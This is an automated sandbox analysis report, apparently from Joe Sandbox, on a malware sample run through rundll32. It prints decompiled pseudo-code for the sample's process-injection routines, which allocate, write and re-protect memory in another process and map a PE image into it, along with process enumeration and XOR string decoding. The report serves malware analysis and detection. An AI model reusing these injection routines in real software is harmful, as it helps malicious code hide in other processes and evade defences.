Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: MemoryVirtual$Protect$ContextLibraryLoadThreadWrite
String ID:
API String ID: 2853935321-0
Opcode ID: 358fb848aecf18e5932688b2d6b2bbf387d272edaf180871e5725c029aed5de7
Instruction ID: b901ac2e804668ee11857cfbd652198dd4c4e42b5b5d7cef365e6014daab9ff3
Opcode Fuzzy Hash: 358fb848aecf18e5932688b2d6b2bbf387d272edaf180871e5725c029aed5de7
Instruction Fuzzy Hash: 154150B1A01219AFDB10DF95D984BEEB7B8FF08394F108165E584D7150E734AE44DF90

Uniqueness

Uniqueness Score: -1.00%

Function 041B1015 Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			_entry_(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				void _v257;
				char _v258;
				char _v260;
				short _v772;
				intOrPtr _t21;
				WCHAR* _t28;
				long _t29;
				char _t32;
				char _t33;
				int _t44;
				void* _t48;
				void* _t58;
				int _t61;
				intOrPtr* _t63;

				_t48 = __ecx;
				if(_a8 != 1) {
					if(_a8 != 0) {
						L11:
						return 1;
					}
					_t21 =  *0x41d0fa0; // 0x439f8a0
					 *((intOrPtr*)(_t21 + 0xbc))(0xaa);
					L3:
					return 0;
				}
				E041B910A();
				E041B94E5();
				 *0x41d0fa8 = _a4;
				 *0x41d0fa4 = 1;
				E041C4357(_a4);
				 *_t63 = 0x14c; // executed
				_t28 = E041B90EA(_t48); // executed
				_a8 = _t28;
				_t29 = GetFileAttributesW(_t28); // executed
				if(_t29 == 0xffffffff) {
					E041B9D66( &_a8);
					_t58 = 0x14;
					_t61 = 0;
					do {
						_t32 =  *0x41cd868; // 0x6665
						_v260 = _t32;
						_t33 =  *0x41cd86a; // 0x0
						_v258 = _t33;
						memset( &_v257, 0, 0xfd);
						memset( &_v772, 0, 0x200);
						_t63 = _t63 + 0x18;
						MultiByteToWideChar(0, 0,  &_v260, 0xffffffff,  &_v772, 0xff);
						_t58 = _t58 - 1;
					} while (_t58 != 0);
					 *0x41d0fa0 = E041B9491(0x144, 0x26e);
					_a8 =  *[fs:0x30];
					if(_a8[1] == 0) {
						L10:
						goto L11;
					}
					_t44 = 0;
					do {
						 *(_t44 + 0x41cf820) =  *(_t44 + 0x41cf820) ^ 0x00000009;
						_t44 = _t44 + 1;
					} while (_t44 < 0x80);
					do {
						 *(_t61 + 0x41cf050) =  *(_t61 + 0x41cf050) ^ 0x000000aa;
						_t61 = _t61 + 1;
					} while (_t61 < 0x80);
					goto L10;
				}
				E041B9D66( &_a8);
				goto L3;
			}

0x041b1015
0x041b1025
0x041b113d
0x041b1132
0x00000000
0x041b1132
0x041b113f
0x041b1149
0x041b106f
0x00000000
0x041b106f
0x041b102b
0x041b1030
0x041b1039
0x041b103e
0x041b1044
0x041b1049
0x041b1050
0x041b1057
0x041b105a
0x041b1066
0x041b1079
0x041b1081
0x041b1082
0x041b1084
0x041b1084
0x041b108a
0x041b1091
0x041b109b
0x041b10a9
0x041b10bb
0x041b10c0
0x041b10da
0x041b10e0
0x041b10e0
0x041b10fa
0x041b1105
0x041b110f
0x041b1130
0x00000000
0x041b1131
0x041b1111
0x041b1118
0x041b1118
0x041b111f
0x041b1120
0x041b1124
0x041b1124
0x041b112b
0x041b112c
0x00000000
0x041b1124
0x041b1069
0x00000000

APIs

Part of subcall function 041B910A: HeapCreate.KERNELBASE(00000000,00096000,00000000,041B1030), ref: 041B9113

GetFileAttributesW.KERNELBASE(00000000), ref: 041B105A
memset.MSVCRT ref: 041B10A9
memset.MSVCRT ref: 041B10BB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 041B10DA

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: memset$AttributesByteCharCreateFileHeapMultiWide
String ID:
API String ID: 371002992-0
Opcode ID: 62722ba75b73aac183de42a156731e3110b24ffe862b11310bb059d17408fdbe
Instruction ID: 46468d54816308413a10b200d4234f0e6c43197c005a0309dd38b357c65bbf13
Opcode Fuzzy Hash: 62722ba75b73aac183de42a156731e3110b24ffe862b11310bb059d17408fdbe
Instruction Fuzzy Hash: FC314771501214BFE7209F79DCC8BDA3BACEB09364F118169F598CB1C1D734A981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 041BCA0F Relevance: 6.1, APIs: 4, Instructions: 63
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E041BCA0F(void* __ecx, void* __edx, void* _a4, long _a8, long _a12) {
				void* _v8;
				long _v12;
				long _v16;
				long _t25;
				long _t37;
				void* _t41;
				void* _t42;

				_t37 = _a8;
				_t41 = __ecx;
				_a8 = _t37;
				_t42 = __edx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_t25 = NtAllocateVirtualMemory(__edx,  &_v8, 0,  &_a8, 0x3000, 4); // executed
				if(_t25 < 0) {
					L6:
					return 0;
				}
				if(NtWriteVirtualMemory(_t42, _v8, _a4, _t37,  &_v12) < 0) {
					L4:
					if(_v8 != 0) {
						 *((intOrPtr*)(_t41 + 4))(_t42,  &_v8,  &_a8, 0x8000);
					}
					goto L6;
				}
				_a8 = _t37;
				if(NtProtectVirtualMemory(_t42,  &_v8,  &_a8, _a12,  &_v16) < 0) {
					goto L4;
				}
				return _v8;
			}

0x041bca16
0x041bca26
0x041bca28
0x041bca31
0x041bca33
0x041bca38
0x041bca3b
0x041bca3e
0x041bca42
0x041bca8d
0x00000000
0x041bca8d
0x041bca55
0x041bca76
0x041bca7a
0x041bca8a
0x041bca8a
0x00000000
0x041bca7a
0x041bca5a
0x041bca6f
0x00000000
0x00000000
0x00000000

APIs

NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 041BCA3E
NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 041BCA50
NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 041BCA6A
NtFreeVirtualMemory.NTDLL(?,00000000,00000000,00008000), ref: 041BCA8A

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: MemoryVirtual$AllocateFreeProtectWrite
String ID:
API String ID: 727285278-0
Opcode ID: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
Instruction ID: da29e032329acf8ed7e0a7c10e798ba00e2674488c7a20824a4819e19a2c7d1c
Opcode Fuzzy Hash: 764091d17d2ff81b09d80ad7801b8b12b2c106c5c80df9ea5506621081ddce91
Instruction Fuzzy Hash: 0C11B676A00109BFDB15CFA5C984EDEBBBCEF08754F10816AFA19D6140E730EB049BA4

Uniqueness

Uniqueness Score: -1.00%

Function 041C43F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E041C43F4(signed int __eax, void* _a4, void* _a8, intOrPtr _a12, void* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				intOrPtr _v40;
				long _v44;
				void* _v48;
				intOrPtr _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				char _v76;
				void* _t180;
				void* _t181;

				_v64 = _v64 & 0x00000000;
				if(_a12 == 0) {
					return __eax | 0xffffffff;
				}
				_v32 = _a12;
				_v40 =  *((intOrPtr*)(_a12 + 0x3c)) + _a12;
				_v52 = _v40;
				_t16 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8; // 0xf8
				_v20 = _a12 + _t16;
				_v36 = _v36 & 0x00000000;
				do {
				} while (0 != 0);
				_v44 = 4;
				_v24 =  *((intOrPtr*)(_v32 + 0x3c)) + 0xf8;
				_v48 = _a16;
				_v28 = NtProtectVirtualMemory(_a8,  &_v48,  &_v24, _v44,  &_v36);
				if(_v28 >= 0) {
					_v12 = _v12 & 0x00000000;
					while(_v12 < ( *(_v52 + 6) & 0x0000ffff)) {
						if( *((intOrPtr*)(_v20 + 0x14 + _v12 * 0x28)) != 0) {
							E041B92A2( &_v76, 0, 9);
							E041B9202( &_v76, _v12 * 0x28 + _v20, 8);
							_t181 = _t181 + 0x18;
							_v60 = _a16 +  *((intOrPtr*)(_v20 + 0xc + _v12 * 0x28));
							_v8 = _v8 & 0x00000000;
							_v56 =  *(_v20 + 0x24 + _v12 * 0x28) & 0xf0000000;
							_v16 = _v56;
							if(_v16 == 0x20000000) {
								_v8 = 0x10;
							} else {
								if(_v16 == 0x40000000) {
									_v8 = 2;
									if( *((char*)(_t180 + 0xbadb65)) == 0x72 &&  *((char*)(_t180 + 0xbadb65)) == 0x64 &&  *((char*)(_t180 + 0xffffffffffffffbb)) == 0x61 &&  *((char*)(_t180 + 0xbadb65)) == 0x74 &&  *((char*)(_t180 + 0xffffffffffffffbd)) == 0x61) {
										_v8 = 4;
									}
								} else {
									if(_v16 == 0x60000000) {
										_v8 = 0x20;
									} else {
										if(_v16 == 0x80000000) {
											_v8 = 4;
										} else {
											if(_v16 == 0xa0000000) {
												_v8 = 0x40;
											} else {
												if(_v16 == 0xc0000000) {
													_v8 = 4;
												} else {
													if(_v16 == 0xe0000000) {
														_v8 = 0x40;
													}
												}
											}
										}
									}
								}
							}
							while(0 != 0) {
							}
							_v24 =  *((intOrPtr*)(_v20 + 0x10 + _v12 * 0x28));
							_v28 = NtProtectVirtualMemory(_a8,  &_v60,  &_v24, _v8,  &_v36);
							if(_v28 >= 0) {
								while(0 != 0) {
								}
								L43:
								L10:
								_v12 = _v12 + 1;
								continue;
							}
							while(0 != 0) {
							}
							goto L43;
						}
						goto L10;
					}
					return 0;
				}
				L6:
				if(0 == 0) {
					return 0xffffffff;
				} else {
				}
				goto L6;
			}

0x041c43fa
0x041c4402
0x00000000
0x041c4404
0x041c440f
0x041c441b
0x041c4421
0x041c442d
0x041c4434
0x041c4437
0x041c443b
0x041c443b
0x041c4441
0x041c4453
0x041c4459
0x041c4474
0x041c447b
0x041c448b
0x041c4498
0x041c44b4
0x041c44c0
0x041c44d6
0x041c44db
0x041c44ec
0x041c44ef
0x041c4503
0x041c4509
0x041c4513
0x041c4564
0x041c4515
0x041c451c
0x041c4570
0x041c4585
0x041c45c6
0x041c45c6
0x041c451e
0x041c4525
0x041c45cf
0x041c452b
0x041c4532
0x041c45d8
0x041c4538
0x041c453f
0x041c45e1
0x041c4545
0x041c454c
0x041c45ea
0x041c4552
0x041c4559
0x041c45f3
0x041c45f3
0x041c4559
0x041c454c
0x041c453f
0x041c4532
0x041c4525
0x041c451c
0x041c45fa
0x041c45fe
0x041c460b
0x041c4626
0x041c462d
0x041c4637
0x041c463b
0x041c463d
0x041c4491
0x041c4495
0x00000000
0x041c4495
0x041c462f
0x041c4633
0x00000000
0x041c4635
0x00000000
0x041c44b6
0x00000000
0x041c4642
0x041c447d
0x041c447f
0x00000000
0x00000000
0x041c4481
0x00000000

APIs

NtProtectVirtualMemory.NTDLL(041B43D8,?,?,00000004,00000000), ref: 041C4471

Strings

@, xrefs: 041C45F3

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: @
API String ID: 2706961497-2766056989
Opcode ID: 5d6acb65a0b66dfe4f450ea08b61fb6c7ae1f8b855b602cec30e187115862d90
Instruction ID: a0e441e9c8b8e1bb3b383022393305eaf5fa0cc5c26365db8181f8bf3324ca1d
Opcode Fuzzy Hash: 5d6acb65a0b66dfe4f450ea08b61fb6c7ae1f8b855b602cec30e187115862d90
Instruction Fuzzy Hash: 897119B4D08259DBDF14CFA8C9E4BEDBBB4AB14309F1085AAD811E6280D374EA81DF51

Uniqueness

Uniqueness Score: -1.00%

Function 041BC71C Relevance: 4.6, APIs: 3, Instructions: 82
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E041BC71C(void* __ecx, void* __edx) {
				void* _v304;
				char _v308;
				intOrPtr _v312;
				char _v316;
				signed int _t20;
				signed int _t21;
				char _t27;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t49;
				void* _t51;
				void* _t55;
				void* _t57;

				_t40 = __edx;
				_v304 = __ecx;
				_t20 = CreateToolhelp32Snapshot(2, 0);
				_t57 = _t20;
				_t21 = _t20 | 0xffffffff;
				if(_t57 != _t21) {
					E041B92A2( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t57,  &_v304) != 0) {
						_t27 = E041B911F(0x20);
						_v316 = _t27;
						_t51 = 0x1f;
						do {
							_t9 = _t51 + 0x63; // 0x82
							 *((char*)(_t51 + _t27)) = _t9;
							_t51 = _t51 - 1;
						} while (_t51 >= 0);
						E041B913B( &_v316, 0);
						while(1) {
							_t55 = _v312( &_v308, _t40);
							if(_t55 == 0) {
								break;
							}
							_t49 =  *0x41d0fa0; // 0x439f8a0
							_push( &_v308);
							_push(_t57);
							if( *((intOrPtr*)(_t49 + 0x48))() != 0) {
								continue;
							}
							break;
						}
						FindCloseChangeNotification(_t57);
						_t21 = 0 | _t55 == 0x00000000;
					} else {
						_t37 =  *0x41d0fa0; // 0x439f8a0
						 *((intOrPtr*)(_t37 + 0x34))(_t57);
						_t21 = 0xfffffffe;
					}
				}
				return _t21;
			}

0x041bc734
0x041bc736
0x041bc73a
0x041bc73d
0x041bc73f
0x041bc744
0x041bc757
0x041bc75f
0x041bc773
0x041bc785
0x041bc78d
0x041bc791
0x041bc792
0x041bc792
0x041bc795
0x041bc798
0x041bc798
0x041bc7a4
0x041bc7ab
0x041bc7b5
0x041bc7bb
0x00000000
0x00000000
0x041bc7bd
0x041bc7c7
0x041bc7c8
0x041bc7ce
0x00000000
0x00000000
0x00000000
0x041bc7ce
0x041bc7d6
0x041bc7dd
0x041bc775
0x041bc775
0x041bc77b
0x041bc780
0x041bc780
0x041bc773
0x041bc7e6

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000019,?,00000018), ref: 041BC73A

Part of subcall function 041B92A2: memset.MSVCRT ref: 041B92B4

Process32First.KERNEL32(00000000,?), ref: 041BC76E
FindCloseChangeNotification.KERNELBASE(00000000), ref: 041BC7D6

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
String ID:
API String ID: 3344077921-0
Opcode ID: 62475acab9748a3519ac8ab0738a06bb624235418de50f60bf5b42c8143fd9c0
Instruction ID: b1799ec0c8d0757793b0607eee0273ffee7097d9285e3b941ae8a04ced4007f5
Opcode Fuzzy Hash: 62475acab9748a3519ac8ab0738a06bb624235418de50f60bf5b42c8143fd9c0
Instruction Fuzzy Hash: FB21C4B36052016FD310DE69D889EDB7BA8EF89360F14055DF690C7181EB24E945C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 041BA412 Relevance: 3.1, APIs: 2, Instructions: 107
nativememoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E041BA412(void* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				long _t37;
				void* _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				void* _t58;
				void* _t71;
				intOrPtr* _t73;

				_v8 = _v8 & 0x00000000;
				_t71 = __edx;
				_t58 = __ecx;
				_t3 = _t71 + 0x3c; // 0x100
				_t73 =  *_t3 + __edx;
				if( *_t73 != 0x4550) {
					L5:
					return 0;
				}
				_v16 =  *(_t73 + 0x50);
				_t37 = NtAllocateVirtualMemory(__ecx,  &_v8, 0,  &_v16, 0x3000, 0x40); // executed
				if(_t37 < 0) {
					goto L5;
				}
				_t38 = E041B918A( *0x41d0fd8, 0x1ac4);
				_v12 = _t38;
				if(_t38 == 0) {
					goto L5;
				}
				 *((intOrPtr*)(_t38 + 0x224)) = _v8;
				_t39 = E041BCA0F( *0x41d10b0, _t58, _t38, 0x1ac4, 4); // executed
				_v20 = _t39;
				_push(0x1ac4);
				_push( &_v12);
				if(_t39 != 0) {
					E041B913B();
					_t42 =  *0x41d0fa8; // 0x41b0000
					_v24 = _t42;
					_t43 =  *0x41d0fd8; // 0x439fc50
					_v28 = _t43;
					 *0x41d0fa8 = _v8;
					 *0x41d0fd8 = _v20;
					_t46 = E041B918A(_t71,  *(_t73 + 0x50)); // executed
					_v12 = _t46;
					if(_t46 == 0) {
						goto L5;
					}
					E041BA391(_t46, _v8, _t71);
					_v32 = _v32 & 0x00000000;
					 *0x41d0fa8 = _v24;
					 *0x41d0fd8 = _v28;
					if(NtWriteVirtualMemory(_t58, _v8, _v12,  *(_t73 + 0x50),  &_v32) < 0) {
						goto L5;
					}
					E041C43F4(_t52,  *0x41d10b0, _t58, _t71, _v8); // executed
					E041B913B( &_v12, 0);
					return _v8;
				}
				E041B913B();
				goto L5;
			}

0x041ba418
0x041ba41f
0x041ba421
0x041ba423
0x041ba426
0x041ba42e
0x041ba4a4
0x00000000
0x041ba4a4
0x041ba435
0x041ba44d
0x041ba451
0x00000000
0x00000000
0x041ba45e
0x041ba463
0x041ba46a
0x00000000
0x00000000
0x041ba473
0x041ba485
0x041ba48d
0x041ba495
0x041ba49a
0x041ba49b
0x041ba4ab
0x041ba4b0
0x041ba4b5
0x041ba4b8
0x041ba4bd
0x041ba4c3
0x041ba4cb
0x041ba4d4
0x041ba4dc
0x041ba4e1
0x00000000
0x00000000
0x041ba4e9
0x041ba4f1
0x041ba4f5
0x041ba4fe
0x041ba51b
0x00000000
0x00000000
0x041ba528
0x041ba533
0x00000000
0x041ba53b
0x041ba49d
0x00000000

APIs

NtAllocateVirtualMemory.NTDLL(041B43D8,00000000,00000000,?,00003000,00000040,?,00000000,041B43D8), ref: 041BA44D
NtWriteVirtualMemory.NTDLL(041B43D8,00000000,?,?,00000000), ref: 041BA516

Part of subcall function 041BCA0F: NtAllocateVirtualMemory.NTDLL(?,00000040,00000000,00000000,00003000,00000004,?,00000000,00000000,00000000,00000000,00000040), ref: 041BCA3E
Part of subcall function 041BCA0F: NtWriteVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 041BCA50
Part of subcall function 041BCA0F: NtProtectVirtualMemory.NTDLL(?,00000040,00000000,00000000,00000000), ref: 041BCA6A

Part of subcall function 041B913B: HeapFree.KERNEL32(00000000,00000000), ref: 041B9181

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: MemoryVirtual$AllocateWrite$FreeHeapProtect
String ID:
API String ID: 4171237596-0
Opcode ID: 52b6abc1c05094abb552964447140468c0b7c9301b4aefe578f72682ba975928
Instruction ID: e4028fb1cf8f5032040b64cdbfe57640ded9790aec422463e08ed0d48487a4df
Opcode Fuzzy Hash: 52b6abc1c05094abb552964447140468c0b7c9301b4aefe578f72682ba975928
Instruction Fuzzy Hash: 574162B1A01205BFEB00DFA5DD94AEE7BF8FF48354F244469E640E7280E774AE419B90

Uniqueness

Uniqueness Score: -1.00%

Function 041BA664 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 145
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E041BA664(WCHAR* __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				char _v28;
				char _v29;
				intOrPtr _v40;
				short _v44;
				void* __ebx;
				signed int _t48;
				signed int _t57;
				intOrPtr _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				char _t80;
				char _t94;
				signed int _t96;
				char _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				void* _t102;
				void* _t103;

				_t95 = __edx;
				_t80 = 0;
				_v24 = __edx;
				_v20 = 0;
				_v8 = 0;
				_t48 = E041BCE25("endless");
				_t96 = _t48;
				_v29 = 0;
				_t98 = 0xf;
				if(_t96 <= _t98) {
					__eflags = _t96;
					if(_t96 == 0) {
						goto L5;
					}
					goto L3;
				} else {
					_t96 = _t98;
					L3:
					_t94 = _t80;
					do {
						_t5 = _t94 + 0x41; // 0x41
						 *((char*)(_t102 + _t94 - 0x28)) = _t5;
						_t94 = _t94 + 1;
					} while (_t94 < _t96);
					L5:
					lstrlenW( &_v44);
					_t97 = E041BA543( &_v20);
					_v28 = _t97;
					if(_t97 != 0) {
						_t99 = _v20;
						_v16 = _t80;
						__eflags = _t99;
						if(_t99 == 0) {
							L27:
							E041B913B( &_v28, _t80);
							return _v8;
						} else {
							goto L11;
						}
						while(1) {
							L11:
							__eflags = _v8 - _t80;
							if(_v8 != _t80) {
								break;
							}
							_t100 = _v8;
							_v12 = 1;
							do {
								__eflags = _t100;
								if(_t100 != 0) {
									break;
								}
								E041B92A2( &_v44, _t80, 0x10);
								_t60 =  *0x41d0fd8; // 0x439fc50
								_t103 = _t103 + 0xc;
								__eflags =  *(_t60 + 0x1898) & 0x00000200;
								if(__eflags != 0) {
									E041BE15A(_t80, _t95, __eflags);
								}
								_t95 =  &_v44;
								_t62 = E041BCA94( *((intOrPtr*)(_t97 + _v16 * 4)),  &_v44); // executed
								__eflags = _t62;
								if(_t62 >= 0) {
									_t95 =  &_v44;
									_t71 = E041BA823(0x41b13b8,  &_v44, _v24, _v12); // executed
									__eflags = _t71;
									if(__eflags != 0) {
										_t72 = E041BA952( &_v44, __eflags); // executed
										__eflags = _t72;
										if(_t72 != 0) {
											_t100 = 1;
											__eflags = 1;
										}
									}
								}
								__eflags = _v44 - _t80;
								if(_v44 != _t80) {
									__eflags = _t100;
									if(_t100 == 0) {
										_t69 =  *0x41d0fa0; // 0x439f8a0
										 *((intOrPtr*)(_t69 + 0x114))(_v44, _t80);
									}
									_t65 =  *0x41d0fa0; // 0x439f8a0
									 *((intOrPtr*)(_t65 + 0x34))(_v40);
									_t67 =  *0x41d0fa0; // 0x439f8a0
									 *((intOrPtr*)(_t67 + 0x34))(_v44);
								}
								_t64 = _v12 + 1;
								_v12 = _t64;
								__eflags = _t64 - 2;
							} while (_t64 <= 2);
							_t57 = _v16 + 1;
							_v8 = _t100;
							_t99 = _v20;
							_v16 = _t57;
							__eflags = _t57 - _t99;
							if(_t57 < _t99) {
								continue;
							} else {
								break;
							}
							do {
								goto L26;
							} while (_t99 != 0);
							goto L27;
						}
						L26:
						E041B913B(_t97, 0xfffffffe);
						_t97 = _t97 + 4;
						_t99 = _t99 - 1;
						__eflags = _t99;
					}
					_t74 = E041BCE25("appear");
					_v29 = _t80;
					if(_t74 > _t98) {
						do {
							L8:
							_t12 = _t80 + 0x41; // 0x41
							 *((char*)(_t102 + _t80 - 0x28)) = _t12;
							_t80 = _t80 + 1;
						} while (_t80 < _t98);
						L9:
						lstrlenW( &_v44);
						return 0;
					}
					_t98 = _t74;
					if(_t98 == 0) {
						goto L9;
					}
					goto L8;
				}
			}

0x041ba664
0x041ba66d
0x041ba66f
0x041ba677
0x041ba67a
0x041ba67d
0x041ba685
0x041ba687
0x041ba68a
0x041ba68d
0x041ba693
0x041ba695
0x00000000
0x00000000
0x00000000
0x041ba68f
0x041ba68f
0x041ba697
0x041ba697
0x041ba699
0x041ba699
0x041ba69c
0x041ba6a0
0x041ba6a1
0x041ba6a5
0x041ba6a9
0x041ba6b7
0x041ba6b9
0x041ba6be
0x041ba6f5
0x041ba6f8
0x041ba6fb
0x041ba6fd
0x041ba7e7
0x041ba7ec
0x00000000
0x00000000
0x00000000
0x00000000
0x041ba703
0x041ba703
0x041ba703
0x041ba706
0x00000000
0x00000000
0x041ba70c
0x041ba70f
0x041ba716
0x041ba716
0x041ba718
0x00000000
0x00000000
0x041ba725
0x041ba72a
0x041ba72f
0x041ba732
0x041ba73c
0x041ba743
0x041ba743
0x041ba74b
0x041ba751
0x041ba756
0x041ba758
0x041ba75d
0x041ba768
0x041ba76f
0x041ba771
0x041ba776
0x041ba77b
0x041ba77d
0x041ba781
0x041ba781
0x041ba781
0x041ba77d
0x041ba771
0x041ba782
0x041ba785
0x041ba787
0x041ba789
0x041ba78b
0x041ba794
0x041ba794
0x041ba79a
0x041ba7a2
0x041ba7a5
0x041ba7ad
0x041ba7ad
0x041ba7b3
0x041ba7b4
0x041ba7b7
0x041ba7b7
0x041ba7c3
0x041ba7c4
0x041ba7c7
0x041ba7ca
0x041ba7cd
0x041ba7cf
0x00000000
0x00000000
0x00000000
0x00000000
0x041ba7d5
0x00000000
0x00000000
0x00000000
0x041ba7d5
0x041ba7d5
0x041ba7d8
0x041ba7de
0x041ba7e2
0x041ba7e2
0x041ba7e2
0x041ba6c5
0x041ba6ca
0x041ba6d0
0x041ba6d8
0x041ba6d8
0x041ba6d8
0x041ba6db
0x041ba6df
0x041ba6e0
0x041ba6e4
0x041ba6e8
0x00000000
0x041ba6ee
0x041ba6d2
0x041ba6d6
0x00000000
0x00000000
0x00000000
0x041ba6d6

APIs

lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 041BA6A9
lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 041BA6E8

Part of subcall function 041B92A2: memset.MSVCRT ref: 041B92B4

Strings

appear, xrefs: 041BA6C0
endless, xrefs: 041BA672

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: lstrlen$memset
String ID: appear$endless
API String ID: 3887242890-2536025861
Opcode ID: 42e5fba076c7827de525e1b4c9e8642536cdc67f506d4038097897d84a8ffffd
